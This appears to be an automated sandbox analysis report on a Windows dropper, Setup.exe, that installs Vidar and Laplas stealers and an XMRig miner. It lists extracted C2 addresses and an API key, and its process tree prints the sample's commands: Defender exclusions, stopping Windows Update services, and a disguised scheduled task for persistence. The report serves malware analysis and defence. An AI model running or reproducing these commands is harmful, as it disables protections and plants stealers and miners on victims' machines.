Analysis
-
max time kernel
134s -
max time network
178s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
04-04-2023 13:36
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-20230220-en
General
-
Target
Setup.exe
-
Size
1023.0MB
-
MD5
ef8d846aec55eddbbfa2472f9d66c2e7
-
SHA1
7e75e159b0a62a62d8d775b6dcd4682b59122c28
-
SHA256
d9a7ab42bcc0d232c84718ef977a0addc3bd7efd184970e88c6f5b85f03c27b1
-
SHA512
791f226bcda1ab1ec0cbaba03ea00ee56325bffbc3b0ee8dd6010d86cc4190c4e8054422e9a1fd9955b42366cb06ebedd0c49ad8b3ed13d17398d23b63fa0314
-
SSDEEP
196608:4+hMmu0Vro/dFqg4cF3VjgY7lEGpDltGgC891SWAo0G:41m3OMEljl7lPftGgPuDr
Malware Config
Extracted
vidar
3.3
49bd1304650cc9c7f3f131428d9e16c2
https://steamcommunity.com/profiles/76561199492257783
https://t.me/justsometg
-
profile_id_v2
49bd1304650cc9c7f3f131428d9e16c2
-
user_agent
Mozilla/5.0 (X11; Linux 3.5.4-1-ARCH i686; es) KHTML/4.9.1 (like Gecko) Konqueror/4.9
Extracted
laplas
http://45.159.189.105
-
api_key
6a2714906f1325d666e4cf9f6269c2352ccfb7e7f1a23c114287dc69ddf27cb0
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 2140 created 3168 2140 56107315853083771435.exe 44 PID 2140 created 3168 2140 56107315853083771435.exe 44 PID 2140 created 3168 2140 56107315853083771435.exe 44 PID 2140 created 3168 2140 56107315853083771435.exe 44 PID 2140 created 3168 2140 56107315853083771435.exe 44 PID 3856 created 3168 3856 updater.exe 44 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Setup.exe -
XMRig Miner payload 1 IoCs
resource yara_rule behavioral2/memory/3856-475-0x00007FF79A460000-0x00007FF79AE45000-memory.dmp xmrig -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts 56107315853083771435.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Setup.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation 09299959774274074556.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation 09299959774274074556.exe -
Executes dropped EXE 6 IoCs
pid Process 3800 18651826726180352056.exe 3440 09299959774274074556.exe 2140 56107315853083771435.exe 3856 updater.exe 4172 09299959774274074556.exe 4600 svcservice.exe -
Loads dropped DLL 2 IoCs
pid Process 4544 Setup.exe 4544 Setup.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe" 09299959774274074556.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Setup.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1552 Setup.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1552 set thread context of 4544 1552 Setup.exe 87 PID 3440 set thread context of 4172 3440 09299959774274074556.exe 126 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe 56107315853083771435.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1092 sc.exe 5076 sc.exe 2436 sc.exe 4692 sc.exe 1892 sc.exe 2084 sc.exe 3400 sc.exe 1532 sc.exe 5060 sc.exe 2944 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Setup.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2876 timeout.exe -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 5c0000000100000004000000000800000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee419000000010000001000000063664b080559a094d10f0a3c5f4f629020000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 Setup.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1552 Setup.exe 1552 Setup.exe 4048 powershell.exe 4048 powershell.exe 4544 Setup.exe 4544 Setup.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 932 powershell.exe 932 powershell.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe 3440 09299959774274074556.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4048 powershell.exe Token: SeDebugPrivilege 1552 Setup.exe Token: SeDebugPrivilege 3440 09299959774274074556.exe Token: SeDebugPrivilege 932 powershell.exe Token: SeDebugPrivilege 424 powershell.exe Token: SeShutdownPrivilege 1220 powercfg.exe Token: SeCreatePagefilePrivilege 1220 powercfg.exe Token: SeDebugPrivilege 4280 powershell.exe Token: SeShutdownPrivilege 2588 powercfg.exe Token: SeCreatePagefilePrivilege 2588 powercfg.exe Token: SeShutdownPrivilege 4244 powercfg.exe Token: SeCreatePagefilePrivilege 4244 powercfg.exe Token: SeShutdownPrivilege 3908 powercfg.exe Token: SeCreatePagefilePrivilege 3908 powercfg.exe Token: SeIncreaseQuotaPrivilege 4280 powershell.exe Token: SeSecurityPrivilege 4280 powershell.exe Token: SeTakeOwnershipPrivilege 4280 powershell.exe Token: SeLoadDriverPrivilege 4280 powershell.exe Token: SeSystemProfilePrivilege 4280 powershell.exe Token: SeSystemtimePrivilege 4280 powershell.exe Token: SeProfSingleProcessPrivilege 4280 powershell.exe Token: SeIncBasePriorityPrivilege 4280 powershell.exe Token: SeCreatePagefilePrivilege 4280 powershell.exe Token: SeBackupPrivilege 4280 powershell.exe Token: SeRestorePrivilege 4280 powershell.exe Token: SeShutdownPrivilege 4280 powershell.exe Token: SeDebugPrivilege 4280 powershell.exe Token: SeSystemEnvironmentPrivilege 4280 powershell.exe Token: SeRemoteShutdownPrivilege 4280 powershell.exe Token: SeUndockPrivilege 4280 powershell.exe Token: SeManageVolumePrivilege 4280 powershell.exe Token: 33 4280 powershell.exe Token: 34 4280 powershell.exe Token: 35 4280 powershell.exe Token: 36 4280 powershell.exe Token: SeIncreaseQuotaPrivilege 4280 powershell.exe Token: SeSecurityPrivilege 4280 powershell.exe Token: SeTakeOwnershipPrivilege 4280 powershell.exe Token: SeLoadDriverPrivilege 4280 powershell.exe Token: SeSystemProfilePrivilege 4280 powershell.exe Token: SeSystemtimePrivilege 4280 powershell.exe Token: SeProfSingleProcessPrivilege 4280 powershell.exe Token: SeIncBasePriorityPrivilege 4280 powershell.exe Token: SeCreatePagefilePrivilege 4280 powershell.exe Token: SeBackupPrivilege 4280 powershell.exe Token: SeRestorePrivilege 4280 powershell.exe Token: SeShutdownPrivilege 4280 powershell.exe Token: SeDebugPrivilege 4280 powershell.exe Token: SeSystemEnvironmentPrivilege 4280 powershell.exe Token: SeRemoteShutdownPrivilege 4280 powershell.exe Token: SeUndockPrivilege 4280 powershell.exe Token: SeManageVolumePrivilege 4280 powershell.exe Token: 33 4280 powershell.exe Token: 34 4280 powershell.exe Token: 35 4280 powershell.exe Token: 36 4280 powershell.exe Token: SeIncreaseQuotaPrivilege 4280 powershell.exe Token: SeSecurityPrivilege 4280 powershell.exe Token: SeTakeOwnershipPrivilege 4280 powershell.exe Token: SeLoadDriverPrivilege 4280 powershell.exe Token: SeSystemProfilePrivilege 4280 powershell.exe Token: SeSystemtimePrivilege 4280 powershell.exe Token: SeProfSingleProcessPrivilege 4280 powershell.exe Token: SeIncBasePriorityPrivilege 4280 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 1552 wrote to memory of 4048 1552 Setup.exe 84 PID 1552 wrote to memory of 4048 1552 Setup.exe 84 PID 1552 wrote to memory of 4048 1552 Setup.exe 84 PID 1552 wrote to memory of 4544 1552 Setup.exe 87 PID 1552 wrote to memory of 4544 1552 Setup.exe 87 PID 1552 wrote to memory of 4544 1552 Setup.exe 87 PID 1552 wrote to memory of 4544 1552 Setup.exe 87 PID 1552 wrote to memory of 4544 1552 Setup.exe 87 PID 1552 wrote to memory of 4544 1552 Setup.exe 87 PID 1552 wrote to memory of 4544 1552 Setup.exe 87 PID 1552 wrote to memory of 4544 1552 Setup.exe 87 PID 1552 wrote to memory of 4544 1552 Setup.exe 87 PID 4544 wrote to memory of 3800 4544 Setup.exe 94 PID 4544 wrote to memory of 3800 4544 Setup.exe 94 PID 3800 wrote to memory of 3704 3800 18651826726180352056.exe 96 PID 3800 wrote to memory of 3704 3800 18651826726180352056.exe 96 PID 4544 wrote to memory of 3440 4544 Setup.exe 98 PID 4544 wrote to memory of 3440 4544 Setup.exe 98 PID 4544 wrote to memory of 3440 4544 Setup.exe 98 PID 3704 wrote to memory of 2420 3704 cmd.exe 99 PID 3704 wrote to memory of 2420 3704 cmd.exe 99 PID 4544 wrote to memory of 2140 4544 Setup.exe 100 PID 4544 wrote to memory of 2140 4544 Setup.exe 100 PID 4544 wrote to memory of 5060 4544 Setup.exe 101 PID 4544 wrote to memory of 5060 4544 Setup.exe 101 PID 4544 wrote to memory of 5060 4544 Setup.exe 101 PID 5060 wrote to memory of 2876 5060 cmd.exe 103 PID 5060 wrote to memory of 2876 5060 cmd.exe 103 PID 5060 wrote to memory of 2876 5060 cmd.exe 103 PID 3440 wrote to memory of 932 3440 09299959774274074556.exe 104 PID 3440 wrote to memory of 932 3440 09299959774274074556.exe 104 PID 3440 wrote to memory of 932 3440 09299959774274074556.exe 104 PID 5068 wrote to memory of 1892 5068 cmd.exe 110 PID 5068 wrote to memory of 1892 5068 cmd.exe 110 PID 5068 wrote to memory of 1092 5068 cmd.exe 111 PID 5068 wrote to memory of 1092 5068 cmd.exe 111 PID 5068 wrote to memory of 2944 5068 cmd.exe 112 PID 5068 wrote to memory of 2944 5068 cmd.exe 112 PID 5068 wrote to memory of 2084 5068 cmd.exe 113 PID 5068 wrote to memory of 2084 5068 cmd.exe 113 PID 5068 wrote to memory of 5076 5068 cmd.exe 114 PID 5068 wrote to memory of 5076 5068 cmd.exe 114 PID 2344 wrote to memory of 1220 2344 cmd.exe 119 PID 2344 wrote to memory of 1220 2344 cmd.exe 119 PID 2344 wrote to memory of 2588 2344 cmd.exe 120 PID 2344 wrote to memory of 2588 2344 cmd.exe 120 PID 2344 wrote to memory of 4244 2344 cmd.exe 121 PID 2344 wrote to memory of 4244 2344 cmd.exe 121 PID 2344 wrote to memory of 3908 2344 cmd.exe 122 PID 2344 wrote to memory of 3908 2344 cmd.exe 122 PID 3440 wrote to memory of 4172 3440 09299959774274074556.exe 126 PID 3440 wrote to memory of 4172 3440 09299959774274074556.exe 126 PID 3440 wrote to memory of 4172 3440 09299959774274074556.exe 126 PID 3440 wrote to memory of 4172 3440 09299959774274074556.exe 126 PID 3440 wrote to memory of 4172 3440 09299959774274074556.exe 126 PID 3440 wrote to memory of 4172 3440 09299959774274074556.exe 126 PID 3440 wrote to memory of 4172 3440 09299959774274074556.exe 126 PID 3440 wrote to memory of 4172 3440 09299959774274074556.exe 126 PID 3440 wrote to memory of 4172 3440 09299959774274074556.exe 126 PID 3440 wrote to memory of 4172 3440 09299959774274074556.exe 126 PID 4172 wrote to memory of 4600 4172 09299959774274074556.exe 127 PID 4172 wrote to memory of 4600 4172 09299959774274074556.exe 127 PID 4172 wrote to memory of 4600 4172 09299959774274074556.exe 127 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3168
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exeC:\Users\Admin\AppData\Local\Temp\Setup.exe3⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\ProgramData\18651826726180352056.exe"C:\ProgramData\18651826726180352056.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\18651826726180352056.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 06⤵PID:2420
-
-
-
-
C:\ProgramData\09299959774274074556.exe"C:\ProgramData\09299959774274074556.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932
-
-
C:\ProgramData\09299959774274074556.exeC:\ProgramData\09299959774274074556.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"6⤵
- Executes dropped EXE
PID:4600 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==7⤵PID:4108
-
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeC:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe7⤵PID:3692
-
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeC:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe7⤵PID:4680
-
-
-
-
-
C:\ProgramData\56107315853083771435.exe"C:\ProgramData\56107315853083771435.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:2140
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Setup.exe" & exit4⤵
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:2876
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:424
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1892
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1092
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2944
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2084
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:5076
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1220
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4244
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rxejhfcm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4280
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Modifies data under HKEY_USERS
PID:1968
-
-
